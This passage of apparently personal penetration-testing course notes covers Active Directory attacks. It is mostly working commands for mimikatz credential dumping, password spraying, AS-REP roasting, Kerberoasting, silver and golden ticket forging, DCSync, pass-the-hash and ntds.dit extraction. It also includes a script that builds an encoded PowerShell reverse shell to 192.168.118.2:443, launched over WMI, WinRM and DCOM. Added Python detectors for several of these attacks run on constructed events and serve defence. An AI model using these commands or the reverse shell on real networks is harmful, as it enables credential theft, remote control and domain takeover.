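    def __init__(self, dc):
        self.dc = dc
        self.transcript = []

    def challenge(self, username):
        nonce = os.urandom(8)
        self.transcript.append(("server->client", username, nonce))
        return nonce

    def authenticate(self, username, nonce, response):
        self.transcript.append(("server->dc", username, nonce, response))
        return self.dc.verify(username, nonce, response)


def client_login(server, username, password):
    """Steps 1 to 7 from the client's side; returns the DC's verdict."""
    key = nt_hash(password)                              # step 1
    nonce = server.challenge(username)                   # steps 2 and 3
    response = compute_response(key, nonce)              # step 4
    return server.authenticate(username, nonce, response)  # steps 5 to 7


if __name__ == "__main__":
    # Constructed accounts for the demo; not real credentials.
    dc = DomainController({"jeff": "CorrectHorseBatteryStaple"})
    srv = Server(dc)
    print("good password:", client_login(srv, "jeff", "CorrectHorseBatteryStaple"))
    print("bad password: ", client_login(srv, "jeff", "wrong"))
```

Two properties follow directly from the model and matter for defence: the server only ever sees (username, nonce, response), so compromising it yields material for offline cracking but not the hash itself; and the nonce makes a captured response single-use, which is why relaying a live exchange (as with ntlmrelayx earlier in these notes) is the attack that works, and why SMB signing and channel binding are the mitigations.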

22.1.2 Kerberos authentication

The authentication model changes

client — DC(KDC)

client — server

The client requests a ticket from the DC, then uses the ticket to access the server.

22.1.3 Cached AD credentials

Hashes are generally stored in LSASS; use mimikatz to dump them

6
xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75
cd C:\Tools
.\mimikatz.exe
privilege::debug
Dump the hashes of logged-on users
sekurlsa::logonpasswords

Abuse TGTs and service tickets for authentication; obtain your own and other users' tickets

dir \\web04.corp.com\backup
sekurlsa::tickets

Both TGTs and TGSs are shown

22.2 Attacks on AD authentication

22.2.1 Password spraying

Brute-forcing passwords can lock accounts, so check the password policy first

net accounts

If a lockout threshold exists, e.g. 5 attempts per 30 minutes, only 4 attempts per 30 minutes can be made, otherwise the account is locked

1) Standard password spraying (using LDAP and ADSI)

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")

If correct

distinguishedName : {DC=corp,DC=com}
Path : LDAP://DC1.corp.com/DC=corp,DC=com

If wrong it shows "The user name or password is incorrect."

A ready-made script can also be used: https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1

cd C:\Tools
powershell -ep bypass
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

2) Password spraying over SMB

crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
"Pwn3d!" means the login succeeded with administrative access

3) TGT-based password spraying

.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

22.2.2 AS-REP roasting

On Kali, use a domain account and password to send AS-REQs to the DC; for accounts that validate it returns the AS-REP key and TGT, which can then be cracked.

impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete
Enter the password when prompted

Crack

2
hashcat --help | grep -i "Kerberos"
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

On Windows, Rubeus.exe can be used with the current user's privileges

cd C:\Tools
.\Rubeus.exe asreproast /nowrap

/nowrap去掉空格,复制下来破解

1
sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

枚举可以使用PowerView命令,或者kali上使用impacket-GetNPUsers

1
2
Get-DomainUser -PreauthNotRequired
impacket-GetNPUsers -dc-ip 192.168.50.70 corp.com/pete

22.2.3 Kerberoasting

On Windows, Rubeus uses the current user to enumerate SPNs and then requests TGS-REPs from the DC:

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack it:

hashcat --help | grep -i "Kerberos"
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

On Kali, use impacket-GetUserSPNs, which needs a domain account and password:

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

What comes back is the hash of the SPN's service account; crack it:

sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
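Both AS-REP roasting (22.2.2) and Kerberoasting (22.2.3) leave a trace on the domain controller: a 4768 event issued without pre-authentication for the former, and a burst of 4769 service-ticket requests with RC4 encryption (type 0x17, the one hashcat mode 13100 cracks) for the latter. As an added example that is not part of the course material or this post, the Python below runs those two checks over constructed DC events reduced to the fields that matter. The event records, account names, service names and addresses are all constructed; the encryption-type and pre-authentication-type values are the ones Windows writes into these events.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC; AES types are 0x11 and 0x12
NO_PREAUTH = "0"    # PreAuthType 0 in event 4768: logon without Kerberos pre-authentication

# Constructed DC security-log events: 4768 = TGT requested, 4769 = service ticket requested.
# "user" is the requesting account, "service" the target (krbtgt for a TGT).
SAMPLE_EVENTS = [
    {"time": "2024-05-07T09:58:00", "id": 4768, "user": "pete", "service": "krbtgt",
     "etype": "0x12", "preauth": "2", "ip": "192.168.50.75"},
    {"time": "2024-05-07T09:59:00", "id": 4768, "user": "dave", "service": "krbtgt",
     "etype": "0x17", "preauth": "0", "ip": "192.168.50.200"},
    {"time": "2024-05-07T10:00:00", "id": 4769, "user": "pete", "service": "iis_service",
     "etype": "0x17", "ip": "192.168.50.200"},
    {"time": "2024-05-07T10:00:02", "id": 4769, "user": "pete", "service": "sql_svc",
     "etype": "0x17", "ip": "192.168.50.200"},
    {"time": "2024-05-07T10:00:04", "id": 4769, "user": "pete", "service": "backup_svc",
     "etype": "0x17", "ip": "192.168.50.200"},
    {"time": "2024-05-07T10:01:00", "id": 4769, "user": "jeff", "service": "FILES04$",
     "etype": "0x12", "ip": "192.168.50.75"},
    {"time": "2024-05-07T10:02:00", "id": 4769, "user": "jeff", "service": "iis_service",
     "etype": "0x12", "ip": "192.168.50.75"},
]


def asrep_roast_candidates(events):
    """Accounts that obtained a TGT without pre-authentication (4768, PreAuthType 0).
    Each of these can be AS-REP roasted by anyone who can reach the DC."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == NO_PREAUTH})


def kerberoast_suspects(events, window_minutes=5, min_services=3):
    """Users that requested RC4 service tickets for >= min_services distinct service
    accounts inside one sliding window. Machine accounts ($) and krbtgt are skipped:
    their tickets are not crackable service-account tickets."""
    window = timedelta(minutes=window_minutes)
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        service = e["service"]
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        by_user[e["user"]].append((datetime.fromisoformat(e["time"]), service))
    suspects = {}
    for user, rows in by_user.items():
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            services = {s for _, s in rows[start:end + 1]}
            if len(services) >= min_services:
                suspects[user] = sorted(services)
                break
    return suspects


if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", asrep_roast_candidates(SAMPLE_EVENTS))
    for user, services in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

The RC4 filter is what makes the 4769 check usable: modern clients ask for AES, so a user account suddenly requesting RC4 tickets for several service accounts in seconds is the Rubeus/GetUserSPNs pattern. The mitigations follow from the same events: enforce pre-authentication on every account the first check lists, and give the accounts behind the SPNs long random passwords (or group managed service accounts) with AES-only encryption.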

22.2.4 Silver Tickets

Knowing the SPN service account and its hash, use the domain SID and the SPN to forge a service ticket for a user who does not otherwise have access.

iwr -UseDefaultCredentials http://web04

Access is denied.

Use mimikatz to obtain the domain SID and the SPN account's hash:

privilege::debug
sekurlsa::logonpasswords

SID : S-1-5-21-1987370270-658905905-1781884369-1109
msv :
[00000003] Primary
* Username : iis_service
* Domain : CORP
* NTLM : 4d28cf5252d39971419580a51484ca09

The SID can also be read from the current user:

whoami /user

The domain SID is the user SID with its last segment (the RID) removed.

Forge the ticket with mimikatz:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
exit

List the tickets and repeat the request; it now succeeds:

klist
iwr -UseDefaultCredentials http://web04

22.2.5 DCSync

Requires a Domain Admin, an Enterprise Admin, or any user that holds the replication (synchronization) rights.

On Windows, use mimikatz to obtain a chosen user's hash:

cd C:\Tools\
.\mimikatz.exe
lsadump::dcsync /user:corp\dave
lsadump::dcsync /user:corp\Administrator

Crack it:

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

On Kali, use impacket-secretsdump:

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
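DCSync works by asking a DC to replicate, so the DC records it like any other replication: an event 4662 on the domain object whose Properties field names the replication control-access rights. Real DCs exercise those rights constantly; a user account doing so is the signal. As an added example that is not part of the course material or this post, the Python below applies that filter to constructed 4662 records reduced to the fields the check needs. The GUIDs are the published Active Directory control-access-right GUIDs; the event records, account names and timestamps are constructed, and the allowlist parameter is an assumption for environments where a directory-synchronization service account legitimately replicates.

```python
# Control-access-right GUIDs that appear in the Properties field of event 4662
# when a principal replicates directory data (what a DCSync request asks for).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 ("an operation was performed on an object") events from a DC,
# reduced to the fields the check needs. DC2$ replicating is normal; a user
# account asking for the same rights is what DCSync looks like in the log.
SAMPLE_EVENTS = [
    {"time": "2024-05-07T12:00:00", "id": 4662, "subject": "DC2$", "domain": "CORP",
     "object_type": "domainDNS",
     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"time": "2024-05-07T12:05:00", "id": 4662, "subject": "jeffadmin", "domain": "CORP",
     "object_type": "domainDNS",
     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"time": "2024-05-07T12:06:00", "id": 4662, "subject": "dave", "domain": "CORP",
     "object_type": "user",
     # constructed placeholder GUID: an ordinary property read, not a replication right
     "properties": "Read Property {00000000-0000-0000-0000-00000000beef}"},
    {"time": "2024-05-07T12:07:00", "id": 4624, "subject": "jeffadmin", "domain": "CORP",
     "object_type": "", "properties": ""},
]


def replication_rights_in(properties):
    """Names of the replication control-access rights referenced in a Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def detect_dcsync(events, allowlist=frozenset()):
    """4662 events in which a non-machine, non-allowlisted account exercised replication
    rights. allowlist holds accounts that are expected to replicate, e.g. a directory
    synchronization service account (assumption; populate it from your own environment)."""
    allowed = {a.lower() for a in allowlist}
    hits = []
    for e in events:
        if e["id"] != 4662:
            continue
        subject = e["subject"]
        if subject.endswith("$") or subject.lower() in allowed:
            continue
        rights = replication_rights_in(e["properties"])
        if rights:
            hits.append({"time": e["time"], "subject": f'{e["domain"]}\\{subject}', "rights": rights})
    return hits


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_EVENTS):
        print(f'{hit["time"]} possible DCSync by {hit["subject"]}: {", ".join(hit["rights"])}')
```

The `$` filter assumes machine accounts only replicate when they belong to real DCs; where that is too loose, compare the subject against the list of domain controllers instead. The corresponding preventive control is the one the section opens with: audit who holds the two replication rights on the domain object, since that ACL, not group membership, is what the DC enforces.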

This part covers chapter 23 of the course, "AD lateral movement techniques" and "AD persistence", recording the tools and commands used.

23.1 AD Lateral Movement Techniques

23.1.1 WMI and WinRM

WMI: Windows Management Instrumentation (port 135 plus a high port in the 19152-65535 range). Create a calculator process remotely:

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

With PowerShell:

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

To get a reverse shell instead, use a PowerShell reverse shell, base64-encoded first:

import base64

# PowerShell TCP reverse shell one-liner that connects back to 192.168.118.2:443
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# "powershell -e" expects base64 of the command's UTF-16LE bytes. encode('utf16')
# prepends a 2-byte byte-order mark, which [2:] strips (equivalent to 'utf-16le').
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Note the UTF-16 encoding.

python3 encode.py

This prints the encoded PowerShell reverse-shell command; use it as the command line of the created process:

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRM: Windows Remote Management (port 5986 for HTTPS, 5985 for HTTP):

winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

With PowerShell:

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential

On success a session is returned, e.g. with Id 1. Enter the session to run commands:

Enter-PSSession 1

23.1.2 PsExec

Requirements:

the user is a member of the local Administrators group
the ADMIN$ share is available
file and printer sharing is enabled

./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

23.1.3 Pass the Hash (PtH)

Requirements:

SMB (port 445) is reachable
the ADMIN$ share is available
file and printer sharing is enabled

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

23.1.4 Overpass the Hash

Once a machine is compromised with local administrator or SYSTEM rights, and an administrator has logged on to it, use mimikatz to obtain that other user's (e.g. a domain admin's) hash and perform overpass-the-hash with it:

privilege::debug
sekurlsa::logonpasswords

Spawn a process under the domain admin's identity:

sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Check the tickets:

klist

No tickets yet. Authenticate to a service, then check again:

net use \\files04
klist

Now there is a ticket. Run commands:

.\PsExec.exe \\files04 cmd

23.1.5 Pass the Ticket

Scenario: the current user cannot access a share; use mimikatz to export the TGS of another user who does have access, import it, and the share becomes reachable:

whoami
ls \\web04\backup

The current user is denied access.

privilege::debug
sekurlsa::tickets /export
dir *.kirbi

Find another account's ticket and inject it into the current session:

kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

klist

dave's ticket is now present:

ls \\web04\backup

Access now works.

23.1.6 DCOM (Distributed Component Object Model)

Uses port 135.

PowerShell:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
tasklist | findstr "calc"

This runs the calculator remotely; swap in the reverse shell:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKIAMQA9A...AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

23.2 AD Persistence

23.2.1 Golden Tickets

Forge a ticket with the krbtgt account's hash:

PsExec64.exe \\DC1 cmd.exe

The current user has no access to DC1.

On DC1, obtain the krbtgt hash:

privilege::debug
lsadump::lsa /patch

This yields the domain SID and the krbtgt hash.

On any machine, first purge the existing tickets, create a golden ticket for the chosen user, and open a cmd as that user:

kerberos::purge
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd

Then access DC1 by hostname; using the IP address does not work:

PsExec.exe \\dc1 cmd.exe
whoami /groups

The current user is now a member of the Domain Admins group.
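Both the silver ticket walkthrough (22.2.4) and the golden ticket walkthrough above end with klist showing the forged ticket in the cache, and that cache is where a host-side check can catch them. As an added example that is not part of the course material or this post, the Python below parses constructed klist output and applies three heuristics: a ticket with no "Kdc Called" entry was injected rather than issued, a lifetime far beyond the ticket policy (mimikatz forges with a 10-year lifetime unless /endin is given), and an RC4-encrypted TGT in a domain that otherwise issues AES tickets. The klist text, principal names and times are constructed; the 10-hour maximum is the Default Domain Policy value and is assumed here rather than read from the domain, and the AES-only baseline is likewise an assumption.

```python
import re
from datetime import datetime, timedelta

# "Maximum lifetime for user ticket" defaults to 10 hours in the Default Domain Policy
# (assumed here; read the real value from the domain's Kerberos policy).
MAX_TICKET_LIFETIME = timedelta(hours=10)

# Constructed klist output: ticket #0 is a forged TGT as mimikatz would inject it
# (RC4, 10-year lifetime, no KDC contacted); ticket #1 is a normal service ticket.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 5/7/2024 10:00:00 (local)
        End Time:   5/5/2034 10:00:00 (local)
        Renew Time: 5/5/2034 10:00:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: jen @ CORP.COM
        Server: cifs/files04.corp.com @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable name_canonicalize ok_as_delegate
        Start Time: 5/7/2024 10:01:00 (local)
        End Time:   5/7/2024 20:00:00 (local)
        Renew Time: 5/14/2024 10:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com
"""


def _parse_time(value):
    # klist prints times as "5/7/2024 10:00:00 (local)"
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def parse_klist(text):
    """Split klist output into one dict per cached ticket, keyed by the printed labels."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        head = re.match(r"#(\d+)>\s*(.*)", line)
        if head:
            current = {"index": int(head.group(1))}
            tickets.append(current)
            line = head.group(2)
        if current is None:
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    return tickets


def assess_ticket(ticket):
    """Return the list of reasons a cached ticket looks forged (empty if it looks normal)."""
    reasons = []
    if not ticket.get("Kdc Called"):
        reasons.append("no KDC was contacted: ticket was injected into the cache, not issued")
    lifetime = _parse_time(ticket["End Time"]) - _parse_time(ticket["Start Time"])
    if lifetime > MAX_TICKET_LIFETIME:
        reasons.append(f"lifetime of {lifetime.days} days exceeds the policy maximum of {MAX_TICKET_LIFETIME}")
    if "RC4" in ticket.get("KerbTicket Encryption Type", "") and ticket.get("Server", "").startswith("krbtgt/"):
        reasons.append("RC4-encrypted TGT although the domain issues AES tickets (assumed baseline)")
    return reasons


def find_forged_tickets(text):
    """(index, server, reasons) for every ticket in klist output that trips a heuristic."""
    flagged = []
    for ticket in parse_klist(text):
        reasons = assess_ticket(ticket)
        if reasons:
            flagged.append((ticket["index"], ticket.get("Server", ""), reasons))
    return flagged


if __name__ == "__main__":
    for index, server, reasons in find_forged_tickets(SAMPLE_KLIST):
        print(f"ticket #{index} ({server}) looks forged:")
        for reason in reasons:
            print("  -", reason)
```

A silver ticket trips the first two checks in the same way (a cifs/ or http/ service ticket with no KDC called and a decade-long lifetime), which is useful because the DC never sees a silver ticket at all. The domain-side counterpart for golden tickets is the krbtgt password rotation (twice, so that the old key also expires) that invalidates every ticket forged from the old hash.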

23.2.2 Shadow Copies

As a domain admin, create a shadow copy:

vshadow.exe -nw -p  C:

- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copy ntds.dit out of the shadow copy:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Save the SYSTEM hive from the registry:

reg.exe save hklm\system c:\system.bak

With these two files, every user's hash can be extracted:

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
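The three steps above (create a shadow copy, copy ntds.dit out of it, save the SYSTEM hive) each produce a process-creation record, and it is their combination on one domain controller within a few minutes that distinguishes credential extraction from a backup job. As an added example that is not part of the course material or this post, the Python below classifies constructed 4688-style process command lines into those steps and raises an alert only when at least two of them occur on the same host inside a window. The event records, hostnames, user names and the 15-minute window are constructed or assumed; vssadmin is matched alongside vshadow because it creates the same kind of copy.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line patterns for each step of the shadow-copy extraction (case-insensitive).
STEP_PATTERNS = {
    "shadow_copy": re.compile(r"\b(vshadow(\.exe)?\b|vssadmin(\.exe)?\s+create\s+shadow)", re.I),
    "ntds_copy":   re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\bntds\.dit\b", re.I),
    "system_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}

# Constructed process-creation (4688) events reduced to the fields the check needs.
# DC1 shows the full extraction sequence; FILES04 shows a lone backup-style shadow copy.
SAMPLE_EVENTS = [
    {"time": "2024-05-07T11:00:00", "host": "DC1", "user": r"CORP\jeffadmin",
     "cmdline": r"vshadow.exe -nw -p C:"},
    {"time": "2024-05-07T11:01:00", "host": "DC1", "user": r"CORP\jeffadmin",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak"},
    {"time": "2024-05-07T11:02:00", "host": "DC1", "user": r"CORP\jeffadmin",
     "cmdline": r"reg.exe save hklm\system c:\system.bak"},
    {"time": "2024-05-07T11:05:00", "host": "DC1", "user": r"CORP\jeffadmin",
     "cmdline": r"notepad.exe"},
    {"time": "2024-05-07T11:30:00", "host": "FILES04", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"C:\Windows\System32\vssadmin.exe create shadow /for=C:"},
]


def classify(cmdline):
    """Name of the extraction step a command line matches, or None."""
    for step, pattern in STEP_PATTERNS.items():
        if pattern.search(cmdline):
            return step
    return None


def find_ntds_extraction(events, window_minutes=15, min_steps=2):
    """Hosts on which >= min_steps distinct extraction steps ran inside one sliding
    window. Returns [{"host", "users", "steps"}], steps sorted by name."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        step = classify(e["cmdline"])
        if step:
            by_host[e["host"]].append((datetime.fromisoformat(e["time"]), e["user"], step))
    alerts = []
    for host, rows in by_host.items():
        best = set()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            steps = {s for _, _, s in rows[start:end + 1]}
            if len(steps) > len(best):
                best = steps
        if len(best) >= min_steps:
            alerts.append({"host": host,
                           "users": sorted({u for _, u, _ in rows}),
                           "steps": sorted(best)})
    return alerts


if __name__ == "__main__":
    for alert in find_ntds_extraction(SAMPLE_EVENTS):
        print(f'{alert["host"]}: possible ntds.dit extraction by {", ".join(alert["users"])} '
              f'({", ".join(alert["steps"])})')
```

Command-line logging must be enabled for 4688 to carry the arguments these patterns need (the "Include command line in process creation events" policy), or Sysmon event 1 can be used in its place. The lone vssadmin call on FILES04 stays below the threshold on purpose: shadow copies by themselves are routine, and alerting on the sequence rather than the single command is what keeps the check usable on a domain controller that is also backed up.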
